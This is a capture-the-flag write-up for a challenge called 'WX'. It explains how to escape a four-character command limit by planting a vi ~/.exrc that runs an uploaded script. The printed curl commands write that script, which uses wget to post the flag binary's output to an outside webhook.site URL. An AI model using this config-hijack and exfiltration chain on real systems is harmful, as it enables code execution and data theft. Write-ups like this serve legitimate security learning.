WX

This challenge provides simple app which is using non-root user patapim with following features:

1. Write a file as non-root user
2. exec command less or equal 4 characters

And we need to execute command /tung tung tung tung tung sahur.

There is also link to another task from KalmarCTF which was inspiration for this task.

I checked writeups for this and similar challenge and I found that couple solutions were used:

1. Write key into .gpg and execute gpg command which would execute code from pubkey
2. use w|su

The second one won’t work because there is also check for | char. The first one won’t work because there is no gpg in alpine image. There is pip command available but it requires couple of directories to be created which is also impossible. So, I tried to find an app which loads some config from ~/ and execute code from there. After some search I found that vi app uses ~/.exrc which allows to execute commands. There are many way to call tung app using vi, here is the one of them:

1. Upload script get_flag.sh which calls tung app and sends output to webhook
2. Upload exrc which would call get_flag script
3. Call vi command Code for this solution:

curl -X POST -d "wget --post-data=\"\$(/tung tung tung tung tung sahur)\" \"https://webhook.site/00000000-0000-0000-0000-000000000000/\" -q" "http://127.0.0.1:7331/write?filename=/home/patapim/get_flag.sh"
curl -X POST -d "\!. ~/get_flag.sh" "http://127.0.0.1:7331/write?filename=/home/patapim/.exrc"
curl "http://127.0.0.1:7331/exec?cmd=vi"